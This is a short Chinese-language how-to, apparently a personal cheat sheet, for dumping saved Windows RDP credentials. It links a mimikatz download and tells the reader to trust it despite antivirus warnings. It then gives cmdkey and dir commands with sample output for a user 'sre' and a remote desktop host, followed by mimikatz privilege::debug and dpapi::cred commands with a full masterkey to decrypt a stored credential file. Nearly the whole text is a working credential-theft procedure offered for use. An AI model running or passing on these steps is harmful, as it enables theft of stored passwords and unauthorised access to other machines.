下载

#会报毒 请信任
https://github.com/ParrotSec/mimikatz

在cmd执行：

#查看是否有保存的凭据密码信息.
cmdkey /list

    目标: LegacyGeneric:target=TERMSRV/172.16.0.108
    类型: 普通
    用户: sre
    本地机器持续时间

#查看保存凭据的目录和凭据的值
dir /a %userprofile%\AppData\Local\Microsoft\Credentials\*

C:\Users\sre>dir /a %userprofile%\AppData\Local\Microsoft\Credentials\*
 驱动器 C 中的卷是 os
 卷的序列号是 761D-F340

 C:\Users\sre\AppData\Local\Microsoft\Credentials 的目录

2022/07/21 周四  14:03    <DIR>          .
2022/07/21 周四  14:03    <DIR>          ..
2022/05/31 周二  17:43               418 3CAA5CFEBA159D5E80B2ED2906C83F4F
2022/08/10 周三  12:11               482 4753865B92CD3B5843262950D6E9C157
2022/04/25 周一  21:25               418 53570B44DCAA1889EDA0B445B6040228
2022/05/07 周六  11:04               418 7D343176CDBDE64D09EBAFB58702269E
2022/06/22 周三  10:50               498 A2A4DE3D3A094A2230DFD1A1F31B4D91
2022/04/27 周三  17:25               466 BF79E68DD4C78FB8BE8B2C6D69CFBEA7
2022/07/21 周四  14:03               434 D0FDC9E448BE01A501D703F707D9DB0A
2022/07/17 周日  21:14            11,506 DFBE70A7E5CC19A398EBF1B96859CE5D
2022/05/18 周三  17:00               418 E4C06FE94F857E7541110382EDAC1D21
               9 个文件         15,058 字节
               2 个目录 73,410,961,408 可用字节

在mimikatz执行：

privilege::debug
dpapi::cred /in:C:\Users\sre\AppData\Local\Microsoft\Credentials\3CAA5CFEBA159D5E80B2ED2906C83F4F #get masterkey
dpapi::cred /in:C:\Users\sre\AppData\Local\Microsoft\Credentials\3CAA5CFEBA159D5E80B2ED2906C83F4F /masterkey:51d3ab5aad2aa540e94b8839d5c8b3d22390ade32a51cbdfe903aa4897bcd65ac3801c06bf6e1f0874b326a991b6c186a85604844193f31573f18bab92a61be5